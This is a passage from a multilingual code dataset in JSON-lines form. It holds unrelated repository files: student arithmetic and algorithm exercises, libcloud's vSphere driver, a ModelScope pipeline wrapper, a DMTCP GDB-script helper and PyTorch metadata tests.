для второго числа\r\n\r\n# Алгоритм:\r\n# С помощью DIV_NN_N находим частное, проверяем не равно ли оно 0, если равно - значит наш массив меньше второго массива, поэтому он является остатком\r\n# Если не равно 0 - с помощью SUB_NDN_N вычитаем из первого числа второе, домноженное на результат деления\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - остаток от деления\r\n\r\ndef MOD_NN_N(n1, arr1, n2, arr2):\r\n b = arr1.copy()\r\n while len(arr1) >= n2:\r\n arr1 = b.copy()\r\n a = DIV_NN_N(n1, arr1, n2, arr2)[1]\r\n arr1 = b\r\n\r\n if a[0] == 0:\r\n return n1, arr1\r\n n1, b = SUB_NDN_N(n1, b, n2, arr2, 1)\r\n arr2.reverse()\r\n\r\n return n1, arr1\r\n\r\n\r\n# Задача N-13(GCF_NN_N): \"НОД натуральных чисел\"\r\n# Выполнил Козориз К.И. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два целых числа, представленных следующим образом:\r\n# Число n1, обозначающее кол-во разрядов, и массив arr1[...] размера n1, содержащий цифры в этих разрядах для первого числа\r\n# Аналогично, n2 и arr2[...] для второго числа\r\n\r\n# Алгоритм:\r\n# Проверяем какое из двух чисел больше с помощтю функции COM_NN_D, идем в цикле while до того момента,\r\n# пока arr1 и arr2 не равны нулю, при этом если arr1 > arr2 - записываем в arr1 остаток от деления arr1 на arr2,\r\n# иначе наоборот, в конце выводим большее из двух массивов\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - НОД двух чисел\r\n\r\ndef GCF_NN_N(n1, arr1, n2, arr2):\r\n while NZER_N_B(n1, arr1) == True and NZER_N_B(n2, arr2) == True:\r\n if COM_NN_D(n1, arr1, n2, arr2) == 2: # arr1 > arr2\r\n n1, arr1 = MOD_NN_N(n1, arr1, n2, arr2)\r\n elif COM_NN_D(n1, arr1, n2, arr2) == 1: # arr1 < arr2\r\n n2, arr2 = MOD_NN_N(n2, arr2, n1, arr1)\r\n else:\r\n return n1, arr1\r\n else:\r\n if COM_NN_D(n1, arr1, n2, arr2) == 2: # arr1 > arr2\r\n return n1, arr1\r\n else:\r\n return n2, arr2\r\n\r\n\r\n# N-14(LCM_NN_N): \"НОК натуральных чисел\"\r\n# Выполнил Данилов А.С. 
1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр A1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр A2[..]\r\n\r\n# Алгоритм:\r\n# НОК двух натуральных чисел равен их произведению, деленному на НОД этих чисел\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - НОК двух чисел\r\n\r\ndef LCM_NN_N(n1, A1, n2, A2):\r\n m1, m2 = MUL_NN_N(n1, A1, n2, A2)\r\n g1, g2 = GCF_NN_N(n1, A1, n2, A2)\r\n return DIV_NN_N(m1, m2, g1, g2)\r\n\r\n\r\n","repo_name":"78Moonlight78/dm_computer_algebra","sub_path":"natural.py","file_name":"natural.py","file_ext":"py","file_size_in_byte":21503,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21860311998","text":"import sys\r\nimport heapq\r\nfrom collections import defaultdict\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\ngraph = defaultdict(list)\r\nfor _ in range(m):\r\n a, b, c = map(int, input().split())\r\n graph[a].append((b, c))\r\n graph[b].append((a, c))\r\n\r\n# 최단거리를 이루는 간선 그래프\r\npath_graph = defaultdict(list)\r\npath_graph[1] = [1]\r\n\r\n# 다익스트라 수행\r\ndistance_list = [float('inf')] * (n+1)\r\n\r\n# 1번부터 시작\r\ndistance_list[1] = 0\r\n\r\n# 현재 위치에서 가장 가까운 거리, 노드 번호, 경로 리스트\r\nheap = [(0, 1, [1])]\r\n\r\nwhile heap:\r\n dist, node, path = heapq.heappop(heap)\r\n \r\n if dist > distance_list[node]:\r\n continue\r\n \r\n for adj_node, adj_dist in graph[node]:\r\n new_dist = dist + adj_dist\r\n \r\n if new_dist < distance_list[adj_node]:\r\n distance_list[adj_node] = new_dist\r\n new_path = path + [adj_node]\r\n \r\n path_graph[adj_node] = new_path\r\n \r\n heapq.heappush(heap, (new_dist, adj_node, new_path))\r\n \r\npath_to_recover = set()\r\n\r\n# 모든 정점까지 최단 거리를 이루는 간선 탐색하여 복구할 회선을 찾음\r\nfor key in path_graph.keys():\r\n if key == 1:\r\n continue\r\n \r\n # 최단거리를 이루는 간선 모음\r\n shortest_path = path_graph[key]\r\n for i in range(len(shortest_path)-1):\r\n path_to_recover.add((shortest_path[i], shortest_path[i+1]))\r\n \r\nprint(len(path_to_recover))\r\n\r\nfor path in path_to_recover:\r\n print(path[0], path[1])","repo_name":"KimChanw/Python_Algorithm","sub_path":"백준/Gold/2211. 네트워크 복구/네트워크 복구.py","file_name":"네트워크 복구.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8994112035","text":"#!/usr/bin/env python3\n#-*- encoding: UTF-8 -*-\n\ndef main():\n try:\n number = int(input(\"Informe um número: \"))\n except:\n print(\"Apenas valores numéricos devem ser informados!\")\n if(number < 0):\n print(\"Apenas valores positivos devem ser informados!\")\n else:\n soma = 0\n aux = number\n while(aux != 0):\n soma = soma + (aux % 10)\n aux = aux // 10\n print(f\"A soma dos algarismo de {number} é {soma}.\")\n\nif(__name__ == \"__main__\"):\n main()\n","repo_name":"luizfelipe1914/Listas-Python","sub_path":"Lista 02/Questao11.py","file_name":"Questao11.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33493469953","text":"import os\nimport sys\nimport atexit\n\ntry:\n import pysphere\n pysphere\nexcept ImportError:\n raise ImportError('Missing \"pysphere\" dependency. 
You can install it '\n 'using pip - pip install pysphere')\n\nfrom pysphere import VIServer\nfrom pysphere.vi_task import VITask\nfrom pysphere.vi_mor import VIMor, MORTypes\nfrom pysphere.resources import VimService_services as VI\nfrom pysphere.vi_virtual_machine import VIVirtualMachine\n\nfrom libcloud.utils.decorators import wrap_non_libcloud_exceptions\nfrom libcloud.common.base import ConnectionUserAndKey\nfrom libcloud.common.types import LibcloudError\nfrom libcloud.common.types import InvalidCredsError\nfrom libcloud.compute.base import NodeDriver\nfrom libcloud.compute.base import NodeLocation\nfrom libcloud.compute.base import NodeImage\nfrom libcloud.compute.base import Node\nfrom libcloud.compute.types import NodeState, Provider\nfrom libcloud.utils.networking import is_public_subnet\n\n__all__ = [\n 'VSphereNodeDriver',\n 'VSphere_5_5_NodeDriver'\n]\n\nDEFAULT_API_VERSION = '5.5'\nDEFAULT_CONNECTION_TIMEOUT = 5 # default connection timeout in seconds\n\n\nclass VSphereConnection(ConnectionUserAndKey):\n def __init__(self, user_id, key, secure=True,\n host=None, port=None, url=None, timeout=None):\n if host and url:\n raise ValueError('host and url arguments are mutually exclusive')\n\n if host:\n host_or_url = host\n elif url:\n host_or_url = url\n else:\n raise ValueError('Either \"host\" or \"url\" argument must be '\n 'provided')\n\n self.host_or_url = host_or_url\n self.client = None\n super(VSphereConnection, self).__init__(user_id=user_id,\n key=key, secure=secure,\n host=host, port=port,\n url=url, timeout=timeout)\n\n def connect(self):\n self.client = VIServer()\n\n trace_file = os.environ.get('LIBCLOUD_DEBUG', None)\n\n try:\n self.client.connect(host=self.host_or_url, user=self.user_id,\n password=self.key,\n sock_timeout=DEFAULT_CONNECTION_TIMEOUT,\n trace_file=trace_file)\n except Exception:\n e = sys.exc_info()[1]\n message = e.message\n fault = getattr(e, 'fault', None)\n\n if fault == 'InvalidLoginFault':\n raise InvalidCredsError(message)\n\n raise LibcloudError(value=message, driver=self.driver)\n\n atexit.register(self.disconnect)\n\n def disconnect(self):\n if not self.client:\n return\n\n try:\n self.client.disconnect()\n except Exception:\n # Ignore all the disconnect errors\n pass\n\n def run_client_method(self, method_name, **method_kwargs):\n method = getattr(self.client, method_name, None)\n return method(**method_kwargs)\n\n\nclass VSphereNodeDriver(NodeDriver):\n name = 'VMware vSphere'\n website = 'http://www.vmware.com/products/vsphere/'\n type = Provider.VSPHERE\n connectionCls = VSphereConnection\n\n NODE_STATE_MAP = {\n 'POWERED ON': NodeState.RUNNING,\n 'POWERED OFF': NodeState.STOPPED,\n 'SUSPENDED': NodeState.SUSPENDED,\n 'POWERING ON': NodeState.PENDING,\n 'POWERING OFF': NodeState.PENDING,\n 'SUSPENDING': NodeState.PENDING,\n 'RESETTING': NodeState.PENDING,\n 'BLOCKED ON MSG': NodeState.ERROR,\n 'REVERTING TO SNAPSHOT': NodeState.PENDING\n }\n\n def __new__(cls, username, password, secure=True, host=None, port=None,\n url=None, api_version=DEFAULT_API_VERSION, **kwargs):\n if cls is VSphereNodeDriver:\n if api_version == '5.5':\n cls = VSphere_5_5_NodeDriver\n else:\n raise NotImplementedError('Unsupported API version: %s' %\n (api_version))\n return super(VSphereNodeDriver, cls).__new__(cls)\n\n def __init__(self, username, password, secure=True,\n host=None, port=None, url=None, timeout=None):\n self.url = url\n super(VSphereNodeDriver, self).__init__(key=username, secret=password,\n secure=secure, host=host,\n port=port, url=url)\n\n 
@wrap_non_libcloud_exceptions\n def list_locations(self):\n \"\"\"\n List available locations.\n\n In vSphere case, a location represents a datacenter.\n \"\"\"\n datacenters = self.connection.client.get_datacenters()\n\n locations = []\n for id, name in datacenters.items():\n location = NodeLocation(id=id, name=name, country=None,\n driver=self)\n locations.append(location)\n\n return locations\n\n @wrap_non_libcloud_exceptions\n def list_images(self):\n \"\"\"\n List available images (templates).\n \"\"\"\n server = self.connection.client\n\n names = ['name', 'config.uuid', 'config.template']\n properties = server._retrieve_properties_traversal(\n property_names=names,\n from_node=None,\n obj_type=MORTypes.VirtualMachine)\n\n images = []\n for prop in properties:\n id = None\n name = None\n is_template = False\n\n for item in prop.PropSet:\n if item.Name == 'config.uuid':\n id = item.Val\n if item.Name == 'name':\n name = item.Val\n elif item.Name == 'config.template':\n is_template = item.Val\n\n if is_template:\n image = NodeImage(id=id, name=name, driver=self)\n images.append(image)\n\n return images\n\n @wrap_non_libcloud_exceptions\n def list_nodes(self):\n vm_paths = self.connection.client.get_registered_vms()\n nodes = self._to_nodes(vm_paths=vm_paths)\n\n return nodes\n\n @wrap_non_libcloud_exceptions\n @wrap_non_libcloud_exceptions\n def ex_clone_node(self, node, name, power_on=True, template=False):\n \"\"\"\n Clone the provided node.\n\n :param node: Node to clone.\n :type node: :class:`libcloud.compute.base.Node`\n\n :param name: Name of the new node.\n :type name: ``str``\n\n :param power_on: Power the new node on after being created.\n :type power_on: ``bool``\n\n :param template: Specifies whether or not the new virtual machine\n should be marked as a template.\n :type template: ``bool``\n\n :return: New node.\n :rtype: :class:`libcloud.compute.base.Node`\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n new_vm = vm.clone(name=name, power_on=power_on, template=template)\n new_node = self._to_node(vm=new_vm)\n\n return new_node\n\n @wrap_non_libcloud_exceptions\n def ex_migrate_node(self, node, resource_pool=None, host=None,\n priority='default'):\n \"\"\"\n Migrate provided node to a new host or resource pool.\n\n :param node: Node to clone.\n :type node: :class:`libcloud.compute.base.Node`\n\n :param resource_pool: ID of the target resource pool to migrate the\n node into.\n :type resource_pool: ``str``\n\n :param host: Target host to migrate the host to.\n :type host: ``str``\n\n :param priority: Migration task priority. 
Possible values: default,\n high, low.\n :type priority: ``str``\n\n :return: True on success.\n :rtype: ``bool``\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n vm.migrate(priority=priority, resource_pool=resource_pool, host=host)\n\n return True\n\n @wrap_non_libcloud_exceptions\n def reboot_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.reset()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def destroy_node(self, node, ex_remove_files=True):\n \"\"\"\n :param ex_remove_files: Remove all the files from the datastore.\n :type ex_remove_files: ``bool``\n \"\"\"\n ex_remove_files = False\n vm = self._get_vm_for_node(node=node)\n\n server = self.connection.client\n\n # Based on code from\n # https://pypi.python.org/pypi/pyxenter\n if ex_remove_files:\n request = VI.Destroy_TaskRequestMsg()\n\n _this = request.new__this(vm._mor)\n _this.set_attribute_type(vm._mor.get_attribute_type())\n request.set_element__this(_this)\n ret = server._proxy.Destroy_Task(request)._returnval\n task = VITask(ret, server)\n\n # Wait for the task to finish\n status = task.wait_for_state([task.STATE_SUCCESS,\n task.STATE_ERROR])\n\n if status == task.STATE_ERROR:\n raise LibcloudError('Error destroying node: %s' %\n (task.get_error_message()))\n else:\n request = VI.UnregisterVMRequestMsg()\n\n _this = request.new__this(vm._mor)\n _this.set_attribute_type(vm._mor.get_attribute_type())\n request.set_element__this(_this)\n ret = server._proxy.UnregisterVM(request)\n task = VITask(ret, server)\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_stop_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.power_off()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_start_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.power_on()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_suspend_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.suspend()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_get_resource_pools(self):\n \"\"\"\n Return all the available resource pools.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_resource_pools()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_resource_pool_name(self, node):\n \"\"\"\n Retrieve resource pool name for the provided node.\n\n :rtype: ``str``\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n return vm.get_resource_pool_name()\n\n @wrap_non_libcloud_exceptions\n def ex_get_hosts(self):\n \"\"\"\n Return all the available hosts.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_hosts()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_datastores(self):\n \"\"\"\n Return all the available datastores.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_datastores()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_node_by_path(self, path):\n \"\"\"\n Retrieve Node object for a VM with a provided path.\n\n :type path: ``str``\n :rtype: :class:`libcloud.compute.base.Node`\n \"\"\"\n vm = self.connection.client.get_vm_by_path(path)\n node = self._to_node(vm=vm)\n return node\n\n def ex_get_node_by_uuid(self, uuid):\n \"\"\"\n Retrieve Node object for a VM with a provided uuid.\n\n :type uuid: ``str``\n \"\"\"\n vm = self._get_vm_for_uuid(uuid=uuid)\n node = self._to_node(vm=vm)\n return node\n\n @wrap_non_libcloud_exceptions\n def ex_get_server_type(self):\n \"\"\"\n Return VMware installation type.\n\n :rtype: ``str``\n \"\"\"\n return self.connection.client.get_server_type()\n\n 
@wrap_non_libcloud_exceptions\n def ex_get_api_version(self):\n \"\"\"\n Return API version of the vmware provider.\n\n :rtype: ``str``\n \"\"\"\n return self.connection.client.get_api_version()\n\n def _get_vm_for_uuid(self, uuid, datacenter=None):\n \"\"\"\n Retrieve VM for the provided UUID.\n\n :type uuid: ``str``\n \"\"\"\n server = self.connection.client\n\n dc_list = []\n if datacenter and VIMor.is_mor(datacenter):\n dc_list.append(datacenter)\n else:\n dc = server.get_datacenters()\n if datacenter:\n dc_list = [k for k, v in dc.iteritems() if v == datacenter]\n else:\n dc_list = list(dc.iterkeys())\n\n for mor_dc in dc_list:\n request = VI.FindByUuidRequestMsg()\n search_index = server._do_service_content.SearchIndex\n mor_search_index = request.new__this(search_index)\n mor_search_index.set_attribute_type(MORTypes.SearchIndex)\n request.set_element__this(mor_search_index)\n\n mor_datacenter = request.new_datacenter(mor_dc)\n mor_datacenter.set_attribute_type(MORTypes.Datacenter)\n request.set_element_datacenter(mor_datacenter)\n\n request.set_element_vmSearch(True)\n request.set_element_uuid(uuid)\n\n try:\n vm = server._proxy.FindByUuid(request)._returnval\n except VI.ZSI.FaultException:\n pass\n else:\n if vm:\n return VIVirtualMachine(server, vm)\n\n return None\n\n def _to_nodes(self, vm_paths):\n nodes = []\n for vm_path in vm_paths:\n vm = self.connection.client.get_vm_by_path(vm_path)\n node = self._to_node(vm=vm)\n nodes.append(node)\n\n return nodes\n\n def _to_node(self, vm):\n assert(isinstance(vm, VIVirtualMachine))\n\n properties = vm.get_properties()\n status = vm.get_status()\n\n uuid = vm.properties.config.uuid\n instance_uuid = vm.properties.config.instanceUuid\n\n id = uuid\n name = properties['name']\n public_ips = []\n private_ips = []\n\n state = self.NODE_STATE_MAP.get(status, NodeState.UNKNOWN)\n ip_address = properties.get('ip_address', None)\n net = properties.get('net', [])\n resource_pool_id = str(vm.properties.resourcePool._obj)\n\n try:\n operating_system = vm.properties.summary.guest.guestFullName,\n except Exception:\n operating_system = 'unknown'\n\n extra = {\n 'uuid': uuid,\n 'instance_uuid': instance_uuid,\n 'path': properties['path'],\n 'resource_pool_id': resource_pool_id,\n 'hostname': properties.get('hostname', None),\n 'guest_id': properties['guest_id'],\n 'devices': properties.get('devices', {}),\n 'disks': properties.get('disks', []),\n 'net': net,\n\n 'overall_status': vm.properties.overallStatus,\n 'operating_system': operating_system,\n\n 'cpus': vm.properties.config.hardware.numCPU,\n 'memory_mb': vm.properties.config.hardware.memoryMB\n }\n\n # Add primary IP\n if ip_address:\n if is_public_subnet(ip_address):\n public_ips.append(ip_address)\n else:\n private_ips.append(ip_address)\n\n # Add other IP addresses\n for nic in net:\n ip_addresses = nic['ip_addresses']\n for ip_address in ip_addresses:\n try:\n is_public = is_public_subnet(ip_address)\n except Exception:\n # TODO: Better support for IPv6\n is_public = False\n\n if is_public:\n public_ips.append(ip_address)\n else:\n private_ips.append(ip_address)\n\n # Remove duplicate IPs\n public_ips = list(set(public_ips))\n private_ips = list(set(private_ips))\n\n node = Node(id=id, name=name, state=state, public_ips=public_ips,\n private_ips=private_ips, driver=self, extra=extra)\n return node\n\n def _get_vm_for_node(self, node):\n uuid = node.id\n vm = self._get_vm_for_uuid(uuid=uuid)\n return vm\n\n def _ex_connection_class_kwargs(self):\n kwargs = {\n 'url': self.url\n }\n\n 
return kwargs\n\n\nclass VSphere_5_5_NodeDriver(VSphereNodeDriver):\n name = 'VMware vSphere v5.5'\n","repo_name":"Psiphon-Inc/psiphon-automation","sub_path":"Automation/libcloud/libcloud/compute/drivers/vsphere.py","file_name":"vsphere.py","file_ext":"py","file_size_in_byte":16515,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"16"} +{"seq_id":"22863633488","text":"import os\nfrom typing import Any, Dict, Generator, List, Union\n\nfrom modelscope.pipelines.base import Input, Pipeline\nfrom modelscope.utils.constant import Hubs\nfrom modelscope.utils.device import create_device\nfrom modelscope.utils.hub import snapshot_download\n\n\nclass DiffusersPipeline(Pipeline):\n\n def __init__(self, model: str, device: str = 'gpu', **kwargs):\n \"\"\"\n use `model` to create a diffusers pipeline\n Args:\n model: model id on modelscope hub or local dir.\n device: str = 'gpu'\n \"\"\"\n\n self.device_name = device\n self.cfg = None\n self.preprocessor = None\n self.framework = None\n self.device = create_device(self.device_name)\n self.hubs = kwargs.get('hubs', Hubs.modelscope)\n\n # make sure we download the model from modelscope hub\n model_folder = model\n if not os.path.isdir(model_folder):\n if self.hubs != Hubs.modelscope:\n raise NotImplementedError(\n 'Only support model retrieval from ModelScope hub for now.'\n )\n model_folder = snapshot_download(model)\n\n self.model = model_folder\n self.models = [self.model]\n self.has_multiple_models = len(self.models) > 1\n\n def preprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n return inputs\n\n def postprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n return inputs\n\n def __call__(self, input: Union[Input, List[Input]], *args,\n **kwargs) -> Union[Dict[str, Any], Generator]:\n preprocess_params, forward_params, postprocess_params = self._sanitize_parameters(\n **kwargs)\n self._check_input(input)\n out = self.preprocess(input, **preprocess_params)\n out = self.forward(out, **forward_params)\n out = self.postprocess(out, **postprocess_params)\n self._check_output(out)\n return out\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/pipelines/multi_modal/diffusers_wrapped/diffusers_pipeline.py","file_name":"diffusers_pipeline.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"71017102729","text":"#!/usr/bin/env python\n\n# Usage: python THIS_FILE PID > GDB_SCRIPT\n# OR: THIS_FILE PID > GDB_SCRIPT\n# Invoke this on a running process, prior to checkpoint.\n# This creates a GDB_SCRIPT file that can restore the debugging\n# information during restart. 
On restart, do:\n# (gdb) source GDB_SCRIPT\n\nimport sys\nimport subprocess\nimport re\nimport os\n\ndef is_executable(filename):\n # 16 bytes for ELF magic number; then 2 bytes (short) for ELF type\n header = open(filename, \"rb\")\n elf_magic_number = header.read(16)\n elf_type = header.read(2)\n # Is it little-endian or big-endian\n elf_type = elf_type[0] if sys.byteorder == \"little\" else elf_type[1]\n # Handle both Python2.7 and Python3: type 2 is executable; type 3 is .so file\n elf_type = elf_type if isinstance(elf_type, int) else ord(elf_type)\n return elf_type == 2\n\n# FROM: https://stackoverflow.com/questions/33049201/gdb-add-symbol-file-all-sections-and-load-address\ndef relocatesections(filename):\n p = subprocess.Popen([\"readelf\", \"-S\", filename], stdout = subprocess.PIPE)\n sections = []\n textaddr = '0'\n for line in p.stdout.readlines():\n line = line.decode(\"utf-8\").strip()\n if not line.startswith('['):\n continue\n if line.startswith('[ 0]') or line.startswith('[Nr]'):\n continue\n line = line.replace(\"[ \", \"[\", 1)\n\n fieldsvalue = line.split()\n fieldsname = ['number', 'name', 'type', 'addr', 'offset', 'size',\n 'entsize', 'flags', 'link', 'info', 'addralign']\n sec = dict(zip(fieldsname, fieldsvalue))\n if not sec['name'].startswith(\".\"):\n continue\n if \".note\" in sec['name']:\n continue\n sections.append(sec)\n if sec['name'] == '.text':\n textaddr = sec['addr']\n return (textaddr, sections)\n\n\ndef writeSymbolFileToScript(filename_substring):\n (filename, base_addr) = memory_region(filename_substring)\n if is_executable(filename):\n base_addr = 0 # ELF executables already hard-wired absolute address\n (textaddr, sections) = relocatesections(filename)\n cmd = \"add-symbol-file %s 0x%x\" % (filename, int(textaddr, 16) + base_addr)\n for s in sections:\n addr = int(s['addr'], 16)\n if s['name'] == '.text' or addr == 0:\n continue\n cmd += \" -s %s 0x%x\" % (s['name'], addr + base_addr)\n print(cmd + \"\\n\")\n\n\ndef saveSymbolFilesToGdbScript():\n if len(sys.argv) != 2:\n sys.stderr.write(\"Usage: %s PID > gdb_script_file\\n\" % sys.argv[0])\n sys.exit(1)\n procmaps_file = \"/proc/\" + getpid() + \"/maps\"\n if (not os.path.isfile(procmaps_file)):\n sys.stderr.write(\"No such file: \" + procmaps_file + \"\\n\")\n sys.exit(1)\n if (not os.access(procmaps_file, os.R_OK)):\n sys.stderr.write(\"No read permission on file: \" + procmaps_file + \"\\n\")\n sys.exit(1)\n\n print(\"# GDB script; Either 'gdb -x THIS_FILE' or: (gdb) source THIS_FILE\\n\")\n for (filename, _) in memory_regions():\n writeSymbolFileToScript(filename)\n\n# Helper functions for writeSymbolFileToScript\ndef getpid():\n return sys.argv[1]\n\n# This returns a pair: (FILENAME_OR_LIBNAME, ADDRESS)\ndef procmap_filename_address(line):\n return (\"/\"+line.split(\" /\")[-1], int(\"0x\"+line.split(\"-\")[0], 16))\ndef memory_regions():\n p = subprocess.Popen([\"cat\", \"/proc/\"+getpid()+\"/maps\"],\n stdout = subprocess.PIPE)\n procmap_lines = [line.decode(\"utf-8\").strip()\n for line in p.stdout.readlines()]\n return [procmap_filename_address(memory) for memory in procmap_lines\n if \" /\" in memory and \"r-x\" in memory]\n\ndef memory_region(filename_substring):\n regions = memory_regions()\n return [region for region in regions if filename_substring in 
region[0]][0]\n\nsaveSymbolFilesToGdbScript()\n","repo_name":"dmtcp/dmtcp","sub_path":"util/save-symbol-files-to-gdb-script.py","file_name":"save-symbol-files-to-gdb-script.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":343,"dataset":"github-code","pt":"16"} +{"seq_id":"34343327028","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris, load_boston\nimport pandas as pd\nimport numpy as np\n\nfrom ai_metadata import ModelSerialization, MiningFunction, MetadataModel\n\nseed = 123456\ntest_size = 0.33\n\n\ndef get_classifier():\n import torch.nn as nn # PyTorch's module wrapper\n\n class Classifier(nn.Module):\n def __init__(self):\n super(Classifier, self).__init__()\n self.h_layer = nn.Linear(4, 3)\n self.s_layer = nn.Softmax()\n\n def forward(self, x):\n y = self.h_layer(x)\n p = self.s_layer(y)\n return p\n\n return Classifier()\n\n\ndef get_net():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n import torch.nn.functional as F\n\n class Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(9216, 128)\n self.fc2 = nn.Linear(128, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n return output\n\n return Net()\n\n\ndef test_classification():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n from torch.autograd import Variable # PyTorch's implementer of gradient descent and back\n\n X, y = load_iris(return_X_y=True)\n Y = pd.get_dummies(y).values\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)\n\n X_train_v = Variable(torch.FloatTensor(X_train), requires_grad=False)\n y_train_v = Variable(torch.FloatTensor(y_train), requires_grad=False)\n X_test_v = Variable(torch.FloatTensor(X_test), requires_grad=False)\n y_test_v = Variable(torch.FloatTensor(y_test), requires_grad=False)\n\n classifier = get_classifier() # declaring the classifier to an object\n loss_fn = nn.BCELoss() # calculates the loss\n optim = torch.optim.SGD(classifier.parameters(), lr=0.01)\n\n for num in range(100): # 100 iterations\n pred = classifier(X_train_v) # predict\n loss = loss_fn(pred, y_train_v) # calculate loss\n optim.zero_grad() # zero gradients to not accumulate\n loss.backward() # update weights based on loss\n optim.step() # update optimiser for next iteration\n\n model = MetadataModel.wrap(classifier,\n x_test=X_test,\n y_test=y_test,\n source_object=get_classifier)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'] == [\n {\n \"name\": None,\n \"sample\": [\n [\n 5.7,\n 4.4,\n 1.5,\n 0.4\n ]\n ],\n \"type\": \"float64\",\n \"shape\": [\n None,\n 4\n ]\n }\n ]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": [\n 1,\n 0,\n 0\n ],\n \"type\": \"uint8\",\n \"shape\": [\n None,\n 3\n ]\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float32\",\n \"shape\": [\n None,\n 3\n ]\n }\n ]\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert 
prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['object_name'] == 'get_classifier'\n assert model_metadata['object_source']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.CLASSIFICATION\n assert model.save_model('./pytorch-cls')\n\n\ndef test_regression():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n\n X, y = load_boston(return_X_y=True)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=seed)\n\n torch.set_default_dtype(torch.float64)\n\n dim = X.shape[1]\n net = nn.Sequential(\n nn.Linear(dim, 50, bias=True), nn.ELU(),\n nn.Linear(50, 50, bias=True), nn.ELU(),\n nn.Linear(50, 50, bias=True), nn.Sigmoid(),\n nn.Linear(50, 1)\n )\n criterion = nn.MSELoss()\n opt = torch.optim.Adam(net.parameters(), lr=.0005)\n y_train_t = torch.from_numpy(y_train).clone().reshape(-1, 1)\n x_train_t = torch.from_numpy(X_train).clone()\n\n losssave = []\n stepsave = []\n\n for i in range(100):\n y_hat = net(x_train_t)\n loss = criterion(y_train_t, net(x_train_t))\n losssave.append(loss.item())\n stepsave.append(i)\n loss.backward()\n opt.step()\n opt.zero_grad()\n y_hat_class = (y_hat.detach().numpy())\n accuracy = np.sum(y_train.reshape(-1, 1) == y_hat_class) / len(y_train)\n if i > 0 and i % 100 == 0:\n print('Epoch %d, loss = %g acc = %g ' % (i, loss, accuracy))\n\n model = MetadataModel.wrap(net,\n x_test=X_test,\n y_test=y_test)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'] == [\n {\n \"name\": None,\n \"sample\": [\n [\n 22.5971,\n 0.0,\n 18.1,\n 0.0,\n 0.7,\n 5.0,\n 89.5,\n 1.5184,\n 24.0,\n 666.0,\n 20.2,\n 396.9,\n 31.99\n ]\n ],\n \"type\": \"float64\",\n \"shape\": [\n None,\n 13\n ]\n }\n ]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": 7.4,\n \"type\": \"float64\",\n \"shape\": None\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": 